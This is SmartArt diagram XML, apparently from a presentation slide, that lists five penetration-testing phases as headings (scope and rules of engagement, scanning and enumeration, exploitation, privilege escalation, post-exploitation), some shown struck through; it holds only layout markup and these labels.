      <dgm:prSet presAssocID="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A36B02A7-59A3-426F-B603-3920425DE26F}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5F68BEC1-687F-4E0E-8423-023D443004E3}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF3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code"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{B56414B9-D181-4419-A8D8-CCBAFA7D8141}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" type="pres">
      <dgm:prSet presAssocID="{E17E2263-F438-4344-BD40-B5111BADF318}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5D5FA34C-4851-4BAA-B34E-9C973884BE17}" type="pres">
      <dgm:prSet presAssocID="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A91B9F34-4F06-4110-8B62-E1B776076E82}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}"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evil face with solid fill"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{07CF9391-F713-4210-A5B1-14AD6686BCEF}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" type="pres">
      <dgm:prSet presAssocID="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD2DE743-D55F-4A9B-9518-DE6FC686A85A}" type="pres">
      <dgm:prSet presAssocID="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E093219D-C5EC-46BE-B695-8DA864C8CD42}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA15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siness Growth"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{9F39AF59-CC58-46C1-B004-B5710D187848}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" type="pres">
      <dgm:prSet presAssocID="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2E4AA06-8C75-4033-9085-806BD3310D87}" type="pres">
      <dgm:prSet presAssocID="{14C0234E-3CA8-4927-86B8-BEF58A01B864}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82464312-F93C-4C32-B8B0-B01AA79186B3}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F4515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 Sign"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{B846F8FF-E9F8-4FB9-B590-C832A34092B3}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B473D}" type="pres">
      <dgm:prSet presAssocID="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E199E815-F78B-446F-B118-C3C11BD05D84}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" srcOrd="3" destOrd="0" parTransId="{40365E31-220F-48C0-8880-E47FCADBA352}" sibTransId="{14C0234E-3CA8-4927-86B8-BEF58A01B864}"/>
    <dgm:cxn modelId="{6002312A-FA14-404F-B7BD-30F94955E9B5}" type="presOf" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" srcOrd="4" destOrd="0" parTransId="{51F4F7FE-9213-41D6-8C4C-A5BA35DCE866}" sibTransId="{F8487A0C-C894-481C-94E5-D04659FD306C}"/>
    <dgm:cxn modelId="{660E9092-DF7F-3B48-8BCB-B0F47E4A32F3}" type="presOf" srcId="{017F54DA-8C45-4223-B231-339957B36A2A}" destId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F68CB096-A6BD-D849-BB44-3102BD52CA5D}" type="presOf" srcId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}" destId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B473D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9E41589B-8E98-E74A-8E1E-7BBD817F6568}" type="presOf" srcId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" destId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{E17E2263-F438-4344-BD40-B5111BADF318}" srcOrd="1" destOrd="0" parTransId="{66526FCD-C377-4E89-926B-0921F4DE675A}" sibTransId="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}"/>
    <dgm:cxn modelId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}" srcOrd="2" destOrd="0" parTransId="{E34FCC54-B2D4-46B6-A2E9-46D2F96049CC}" sibTransId="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}"/>
    <dgm:cxn modelId="{B5EF9DE9-59FE-5846-8D93-B0510B3FF7C4}" type="presOf" srcId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}" destId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{84406DFC-50FF-4F4F-A773-427DFC387A30}" srcId="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" destId="{017F54DA-8C45-4223-B231-339957B36A2A}" srcOrd="0" destOrd="0" parTransId="{387C6D98-AD22-45C7-BEEB-9A04A44E216F}" sibTransId="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}"/>
    <dgm:cxn modelId="{7162BAFC-FFA9-3C43-BDE0-025AA1665112}" type="presOf" srcId="{E17E2263-F438-4344-BD40-B5111BADF318}" destId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AB517B32-4DF4-C447-A2B9-21C616739D22}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{2592946B-61BA-46ED-881D-9DA483A16A44}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F15C1677-3C61-7C4C-B874-86263976103B}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{8DD4F3DC-D491-4459-8D5C-A055C70E6E87}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FECC4AB4-9407-794C-85EA-F67A7C1668B1}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{B5676437-86DB-485F-9635-BD51C998B2E6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{AB55C33A-D2A2-7F42-A3AA-ED3C07F0D21D}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{4185D61E-F9A5-46BE-A5F7-25AB46FA98AD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{17866F72-0549-0A46-955E-0DFC10CF1A8B}" type="presParOf" srcId="{2592946B-61BA-46ED-881D-9DA483A16A44}" destId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{015DDAE8-6A4D-CE44-BAB4-3EDFE46FFAB1}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{4CCB4225-02F4-4A7D-9B45-B23DE49547CA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BBDDF357-9CA8-0948-9D61-43DEBA35D4CA}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0EFA4E16-65A5-8E4C-9863-202311DF2DBC}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{A36B02A7-59A3-426F-B603-3920425DE26F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7B4AC9E3-3F04-A746-8F03-9C9AECF69BCD}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{5F68BEC1-687F-4E0E-8423-023D443004E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{495C1ECF-CBCF-5E43-948D-19226AB1E4A5}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{B56414B9-D181-4419-A8D8-CCBAFA7D8141}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CF09F298-3EA8-2543-86C7-174489DE771C}" type="presParOf" srcId="{11693BAA-1C05-421F-A5C8-1A601A6DAE5C}" destId="{3AC9ED47-20CB-488E-BA89-45D2E1A73A3D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{98CFBB8A-ED2E-A04F-B15E-F1C693C3B731}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{5D5FA34C-4851-4BAA-B34E-9C973884BE17}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C20DE855-0AE2-2143-8511-19E73A4FC519}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{54C6C7CC-18DC-B643-A907-83344291D716}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{32E16B08-EA1A-492A-8D2B-EF883433C33A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3681FBD6-ACA7-7342-954B-4D04304056C3}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{A91B9F34-4F06-4110-8B62-E1B776076E82}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2B40CEA7-77C4-2048-8040-4D0EF47590FB}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{07CF9391-F713-4210-A5B1-14AD6686BCEF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{677FB914-337C-8B4D-92C0-F2DA86EDE2A9}" type="presParOf" srcId="{729DA5BB-873A-47C9-94EC-57A7D504DC85}" destId="{9098A641-5468-4E81-9B6C-E67EDD5023C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D7E18B81-9C85-D34E-BB08-80F5BFE22D4B}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{CD2DE743-D55F-4A9B-9518-DE6FC686A85A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{66DCED86-3DA8-E145-B484-4AA7CB547F11}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E78295CD-8B55-0044-92C2-28C37181996A}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{4DA4D047-3135-46E0-98A5-ED174EA4B1C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0076BBC1-2B0D-5B4E-BB03-C23090CF72FF}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{E093219D-C5EC-46BE-B695-8DA864C8CD42}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8A6B409B-509D-714A-B793-3941559E387B}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{9F39AF59-CC58-46C1-B004-B5710D187848}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6FB90FFC-4280-0846-8862-462B6A9B435D}" type="presParOf" srcId="{CB7A6DBA-EB25-46F6-B10D-13230C3DA8BE}" destId="{3859A86C-DAB9-4843-AF9A-CFCAAD65D9E1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2D0661B9-2AB1-2C47-B95D-EAD40DFB7270}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{B2E4AA06-8C75-4033-9085-806BD3310D87}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D4952423-9811-E04D-930C-E2E792CD3517}" type="presParOf" srcId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" destId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D5E956DC-9407-3B49-8A98-D0B61147F0D8}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{1726CD9B-E662-4378-A9B2-C6E525AF990F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D30C39E1-93AB-0444-9134-B374449DF8A5}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{82464312-F93C-4C32-B8B0-B01AA79186B3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0B71C586-7F36-DF4F-88C6-916F4C31CBDA}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{B846F8FF-E9F8-4FB9-B590-C832A34092B3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5F410BF8-5798-3145-9F45-6E096960AB63}" type="presParOf" srcId="{53262A56-F2BD-43A2-8DDD-A6AC31874232}" destId="{C2CC89B4-6830-4A0A-A6EA-1A723B2B47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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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3506AA-5689-4C9D-9A7F-70B535246B6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17F54DA-8C45-4223-B231-339957B36A2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" strike="sngStrike"/>
            <a:t>Scope and Rules of Engagement</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{387C6D98-AD22-45C7-BEEB-9A04A44E216F}" type="parTrans" cxnId="{84406DFC-50FF-4F4F-A773-427DFC387A30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}" type="sibTrans" cxnId="{84406DFC-50FF-4F4F-A773-427DFC387A30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E17E2263-F438-4344-BD40-B5111BADF318}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Scanning and Enumeration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66526FCD-C377-4E89-926B-0921F4DE675A}" type="parTrans" cxnId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}" type="sibTrans" cxnId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E34FCC54-B2D4-46B6-A2E9-46D2F96049CC}" type="parTrans" cxnId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}" type="sibTrans" cxnId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Privilege Escalation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40365E31-220F-48C0-8880-E47FCADBA352}" type="parTrans" cxnId="{E199E815-F78B-446F-B118-C3C11BD05D84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14C0234E-3CA8-4927-86B8-BEF58A01B864}" type="sibTrans" cxnId="{E199E815-F78B-446F-B118-C3C11BD05D84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" strike="sngStrike"/>
            <a:t>Pillaging and Post Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51F4F7FE-9213-41D6-8C4C-A5BA35DCE866}" type="parTrans" cxnId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8487A0C-C894-481C-94E5-D04659FD306C}" type="sibTrans" cxnId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" type="pres">
      <dgm:prSet presAssocID="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2592946B-61BA-46ED-881D-9DA483A16A44}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8DD4F3DC-D491-4459-8D5C-A055C70E6E87}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5676437-86DB-485F-9635-BD51C998B2E6}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A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4185D61E-F9A5-46BE-A5F7-25AB46FA98AD}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
